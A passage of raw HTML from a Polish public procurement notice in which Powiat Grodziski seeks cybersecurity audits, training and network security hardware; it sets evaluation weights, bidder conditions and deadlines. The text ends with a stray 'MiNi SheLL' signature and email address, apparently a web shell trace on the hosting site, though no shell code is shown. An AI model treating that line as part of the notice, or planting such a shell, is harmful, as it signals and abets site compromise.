class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na sprzęt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na oprogramowanie i wdrożenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia ubiegać mogą się Wykonawcy którzy spełniają warunki udziału w postępowaniu zgodnie z art. 112 ust. 2 pkt 1) - 4) tj.:<br/>- zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>- uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>- sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>- zdolności technicznej i zawodowej: <br/>Dla Części I:<br/>1)	Warunek: potencjał techniczny:<br/>O zamówienie mogą ubiegać się Wykonawcy, których potencjał techniczny pozwoli na prawidłowe wykonanie zamówienia - posiadają kompetencje wskazane w Szczegółowym Opisie Przedmiotu Zamówienia (Załącznik nr 1a do SWZ) oraz złoży stosowne oświadczenia zgodnie z treścią określoną w załączniku Nr 2 do SWZ;<br/>2)	Warunek: wiedza i doświadczenie:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>Dla Części II:<br/>1)	Warunek: potencjał techniczny:<br/>O zamówienie mogą ubiegać się Wykonawcy, których potencjał techniczny pozwoli na prawidłowe wykonanie zamówienia - posiadają kompetencje wskazane w Szczegółowym Opisie Przedmiotu Zamówienia (Załącznik nr 1b do SWZ) oraz złoży stosowne oświadczenia zgodnie z treścią określoną w załączniku Nr 2 do SWZ;<br/>2)	Warunek: wiedza i doświadczenie:<br/>O zamówienie mogą ubiegać się Wykonawcy, których wiedza i doświadczenie pozwoli <br/>na prawidłowe wykonanie zamówienia, tj. którzy w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali z należytą starannością co najmniej jedną dostawę o porównywalnym zakresie (m.in. sprzętu komputerowego, serwerów) o wartości minimum 400 000,00 zł brutto PLN w ramach jednego kontraktu (umowy). Zamawiający uzna warunek za spełniony jeśli Wykonawca przedłoży dokument określający wykaz dostaw stanowiący Załącznik nr 6 do SWZ oraz dokument potwierdzający, że dostawy zrealizowane zostały w sposób należyty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności <br/><br/>do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 1616), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz <br/>z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 5 do SWZ<br/>2. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu <br/>do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz wykonanych w ciągu ostatnich 3 lat dostaw odpowiadających przedmiotowi zamówienia (dot. Części 2) - załącznik Nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Zamawiający na podstawie art. 105-107 ustawy Pzp, na potwierdzenie zgodności oferowanego przedmiotu zamówienia, wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych.<br/>2. W zakresie Części 1 wykaz przedmiotowych środków dowodowych szczegółowo został opisany w SWZ - w Rozdziale II pkt. 29..2:<br/>- I.	AUDYT SZBI ORAZ AKTUALIZACJA SYSTEMU ZARZĄDZANIA BEZPIECZEŃSTWEM INFORMACJI W TYM POLITYKI BEZPIECZEŃSTWA INFORMACJI.<br/>- II. SZKOLENIA Z TESTAMI SOCJOTECHNICZNYMI DLA PRACOWNIKÓW STAROSTWA.<br/>- III.	SZKOLENIA SPECJALISTYCZNE DLA INFORMATYKÓW STAROSTWA Z ZAKRESU CYBERBEZPIECZEŃSTWA.<br/>3. W zakresie Części 2 wykaz przedmiotowych środków dowodowych szczegółowo został opisany w SWZ - w Rozdziale II pkt. 29..2:<br/>- I.	SERWER DO URUCHOMIENIA USŁUG POPRAWIAJĄCYCH CYBERBEZPIECZEŃSTWA.<br/>- II.	SYSTEM NETWORK ACCESS CONTROL DO IZOLACJI SIECI LAN.<br/>- III. SYSTEM UTM DO OCHRONY SIECI LAN.<br/>- IV. PRZEŁACZNIKI ZARZĄDZALNE.<br/>- V. UPS RACK DO SERWEROWNI.<br/>- VI. OPROGRAMOWANIE ANTYWIRUSOWE. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. Zamawiający na podstawie art. 105-107 ustawy Pzp, na potwierdzenie zgodności oferowanego przedmiotu zamówienia, wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych.<br/>2. W zakresie Części 1 wykaz przedmiotowych środków dowodowych szczegółowo został opisany w SWZ - w Rozdziale II pkt. 29..2:<br/>- I.	AUDYT SZBI ORAZ AKTUALIZACJA SYSTEMU ZARZĄDZANIA BEZPIECZEŃSTWEM INFORMACJI W TYM POLITYKI BEZPIECZEŃSTWA INFORMACJI.<br/>- II. SZKOLENIA Z TESTAMI SOCJOTECHNICZNYMI DLA PRACOWNIKÓW STAROSTWA.<br/>- III.	SZKOLENIA SPECJALISTYCZNE DLA INFORMATYKÓW STAROSTWA Z ZAKRESU CYBERBEZPIECZEŃSTWA.<br/>3. W zakresie Części 2 wykaz przedmiotowych środków dowodowych szczegółowo został opisany w SWZ - w Rozdziale II pkt. 29..2:<br/>- I.	SERWER DO URUCHOMIENIA USŁUG POPRAWIAJĄCYCH CYBERBEZPIECZEŃSTWA.<br/>- II.	SYSTEM NETWORK ACCESS CONTROL DO IZOLACJI SIECI LAN.<br/>- III. SYSTEM UTM DO OCHRONY SIECI LAN.<br/>- IV. PRZEŁACZNIKI ZARZĄDZALNE.<br/>- V. UPS RACK DO SERWEROWNI.<br/>- VI. OPROGRAMOWANIE ANTYWIRUSOWE. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> - Pełnomocnictwo lub inny dokument potwierdzający do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy);<br/>- Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, tj. oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie wskazanym przez Zamawiającego - załącznik nr 2 do SWZ. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w art. 125 ust. 1 ustawy Pzp w pkt 1), także oświadczenie podmiotu udostępniającego zasoby (wg Załącznika nr 3 do SWZ);<br/>- Oświadczenie Wykonawców wspólnie ubiegających się o zamówienie - wg Załącznika nr 4 do SWZ (jeżeli dotyczy). W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy zgodnie z art. 117 ustawy Pzp mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2.	Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o zamówienie:<br/>a)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą łącznie spełniać warunki udziału w postępowaniu, o których mowa w Rozdziale II pkt 29;<br/>b)	każdy z Wykonawców wspólnie ubiegających się o zamówienie musi spełnić warunki dotyczące niepodlegania wykluczeniu z postępowania – Rozdział II pkt 29;<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, zobowiązani są załączyć do oferty stosowne pełnomocnictwo. Brak w ofercie ww. pełnomocnictwa lub jego nieuzupełnienie, <br/>we wskazanym przez Zamawiającego terminie, w trybie art. 226 ust 1 pkt c) ustawy Pzp stanowić będzie podstawę odrzucenia oferty. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy określa wzór umowy stanowiący załącznik nr 7a (dot. Części 1) oraz 7b (dot. Części 2) do SWZ. Złożenie oferty jest równoznaczne z pełną akceptacją projektu umowy przez Wykonawcę. Rodzaj i zakres zmian umowy został określony w par. 10 projektów umów, stanowiących załącznik nr 7a, 7b do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://asystent.postepowania.pl/org/powiat-grodziski/postepowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-21 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com